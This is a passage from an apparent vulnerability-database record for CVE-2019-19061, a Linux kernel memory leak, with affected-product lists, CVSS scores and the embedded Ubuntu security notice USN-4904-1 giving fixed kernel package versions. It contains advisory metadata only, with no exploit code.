Ubuntu 14.04 ESM: linux-image-4.4.0-1090-aws 4.4.0-1090.94 linux-image-4.4.0-208-generic 4.4.0-208.240~14.04.1 linux-image-4.4.0-208-generic-lpae 4.4.0-208.240~14.04.1 linux-image-4.4.0-208-lowlatency 4.4.0-208.240~14.04.1 linux-image-aws 4.4.0.1090.87 linux-image-generic-lpae-lts-xenial 4.4.0.208.181 linux-image-generic-lts-xenial 4.4.0.208.181 linux-image-lowlatency-lts-xenial 4.4.0.208.181 linux-image-virtual-lts-xenial 4.4.0.208.181

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4904-1 CVE-2015-1350, CVE-2017-16644, CVE-2017-5967, CVE-2018-13095, CVE-2019-16231, CVE-2019-16232, CVE-2019-19061, CVE-2021-20261, CVE-2021-26930, CVE-2021-26931, CVE-2021-28038

Package Information: https://launchpad.net/ubuntu/+source/linux/4.4.0-208.240 https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1126.140 https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1091.100 https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1150.161 https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1154.164

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1414",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "5.3.9"
      },
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.262"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.192"
      },
      {
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.1"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.25"
      },
      {
        "model": "aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.3r2"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.1"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.1"
      },
      {
        "model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.10"
      },
      {
        "model": "fas\\/aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30.5r3"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.137"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.262"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.5"
      },
      {
        "model": "hci baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "h610s"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.3"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.2"
      },
      {
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.20"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.9"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19061"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.262",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.137",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.3.9",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.192",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.262",
                "versionStartIncluding": "3.9",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_\\\u0026_hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire\\,_enterprise_sds_\\\u0026_hci_storage_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:fas\\/aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30.5r3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.3r2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:hci_compute_node_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19061"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "159250"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2019-19061",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19061",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-151470",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19061",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-19061",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-1080",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-151470",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-19061",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19061"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19061"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A memory leak in the adis_update_scan_mode_burst() function in drivers/iio/imu/adis_buffer.c in the Linux kernel before 5.3.9 allows attackers to cause a denial of service (memory consumption), aka CID-9c0530e898f3. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-9c0530e898f3 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. ==========================================================================\nUbuntu Security Notice USN-4904-1\nApril 13, 2021\n\nlinux, linux-aws, linux-kvm, linux-lts-xenial, linux-raspi2,\nlinux-snapdragon vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux: Linux kernel\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-kvm: Linux kernel for cloud environments\n- linux-raspi2: Linux kernel for Raspberry Pi (V8) systems\n- linux-snapdragon: Linux kernel for Qualcomm Snapdragon processors\n- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty\n\nDetails:\n\nBen Harris discovered that the Linux kernel would strip extended privilege\nattributes of files when performing a failed unprivileged system call. A\nlocal attacker could use this to cause a denial of service. (CVE-2015-1350)\n\nAndrey Konovalov discovered that the video4linux driver for Hauppauge HD\nPVR USB devices in the Linux kernel did not properly handle some error\nconditions. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2017-16644)\n\nIt was discovered that the timer stats implementation in the Linux kernel\nallowed the discovery of a real PID value while inside a PID namespace. A\nlocal attacker could use this to expose sensitive information. \n(CVE-2017-5967)\n\nWen Xu discovered that the xfs file system implementation in the Linux\nkernel did not properly validate the number of extents in an inode. An\nattacker could use this to construct a malicious xfs image that, when\nmounted, could cause a denial of service (system crash). (CVE-2018-13095)\n\nIt was discovered that the Fujitsu ES network device driver for the Linux\nkernel did not properly check for errors in some situations, leading to a\nNULL pointer dereference. A local attacker could use this to cause a denial\nof service. (CVE-2019-16231)\n\nIt was discovered that the Marvell 8xxx Libertas WLAN device driver in the\nLinux kernel did not properly check for errors in certain situations,\nleading to a NULL pointer dereference. A local attacker could possibly use\nthis to cause a denial of service. (CVE-2019-16232)\n\nIt was discovered that the ADIS16400 IIO IMU Driver for the Linux kernel\ndid not properly deallocate memory in certain error conditions. \n(CVE-2019-19061)\n\nIt was discovered that a race condition existed in the floppy device driver\nin the Linux kernel. An attacker with access to the floppy device could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2021-20261)\n\nOlivier Benjamin, Norbert Manthey, Martin Mazein, and Jan H. Sch\\xf6nherr\ndiscovered that the Xen paravirtualization bckend in the Linux kernel did\nnot properly propagate errors to frontend drivers in some situations. An\nattacker in a guest VM could possibly use this to cause a denial of service\n(host domain crash). (CVE-2021-26930)\n\nJan Beulich discovered that multiple Xen backends in the Linux kernel did\nnot properly handle certain error conditions under paravirtualization. An\nattacker in a guest VM could possibly use this to cause a denial of service\n(host domain crash). (CVE-2021-26931)\n\nJan Beulich discovered that the Xen netback backend in the Linux kernel did\nnot properly handle certain error conditions under paravirtualization. An\nattacker in a guest VM could possibly use this to cause a denial of service\n(host domain crash). (CVE-2021-28038)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n  linux-image-4.4.0-1091-kvm      4.4.0-1091.100\n  linux-image-4.4.0-1126-aws      4.4.0-1126.140\n  linux-image-4.4.0-1150-raspi2   4.4.0-1150.161\n  linux-image-4.4.0-1154-snapdragon  4.4.0-1154.164\n  linux-image-4.4.0-208-generic   4.4.0-208.240\n  linux-image-4.4.0-208-generic-lpae  4.4.0-208.240\n  linux-image-4.4.0-208-lowlatency  4.4.0-208.240\n  linux-image-4.4.0-208-powerpc-e500mc  4.4.0-208.240\n  linux-image-4.4.0-208-powerpc-smp  4.4.0-208.240\n  linux-image-4.4.0-208-powerpc64-emb  4.4.0-208.240\n  linux-image-4.4.0-208-powerpc64-smp  4.4.0-208.240\n  linux-image-aws                 4.4.0.1126.131\n  linux-image-generic             4.4.0.208.214\n  linux-image-generic-lpae        4.4.0.208.214\n  linux-image-kvm                 4.4.0.1091.89\n  linux-image-lowlatency          4.4.0.208.214\n  linux-image-powerpc-e500mc      4.4.0.208.214\n  linux-image-powerpc-smp         4.4.0.208.214\n  linux-image-powerpc64-emb       4.4.0.208.214\n  linux-image-powerpc64-smp       4.4.0.208.214\n  linux-image-raspi2              4.4.0.1150.150\n  linux-image-snapdragon          4.4.0.1154.146\n  linux-image-virtual             4.4.0.208.214\n\nUbuntu 14.04 ESM:\n  linux-image-4.4.0-1090-aws      4.4.0-1090.94\n  linux-image-4.4.0-208-generic   4.4.0-208.240~14.04.1\n  linux-image-4.4.0-208-generic-lpae  4.4.0-208.240~14.04.1\n  linux-image-4.4.0-208-lowlatency  4.4.0-208.240~14.04.1\n  linux-image-aws                 4.4.0.1090.87\n  linux-image-generic-lpae-lts-xenial  4.4.0.208.181\n  linux-image-generic-lts-xenial  4.4.0.208.181\n  linux-image-lowlatency-lts-xenial  4.4.0.208.181\n  linux-image-virtual-lts-xenial  4.4.0.208.181\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4904-1\n  CVE-2015-1350, CVE-2017-16644, CVE-2017-5967, CVE-2018-13095,\n  CVE-2019-16231, CVE-2019-16232, CVE-2019-19061, CVE-2021-20261,\n  CVE-2021-26930, CVE-2021-26931, CVE-2021-28038\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux/4.4.0-208.240\n  https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1126.140\n  https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1091.100\n  https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1150.161\n  https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1154.164\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19061"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "db": "VULHUB",
        "id": "VHN-151470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19061"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "159250"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-19061",
        "trust": 2.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162163",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1080",
        "trust": 0.7
      },
      {
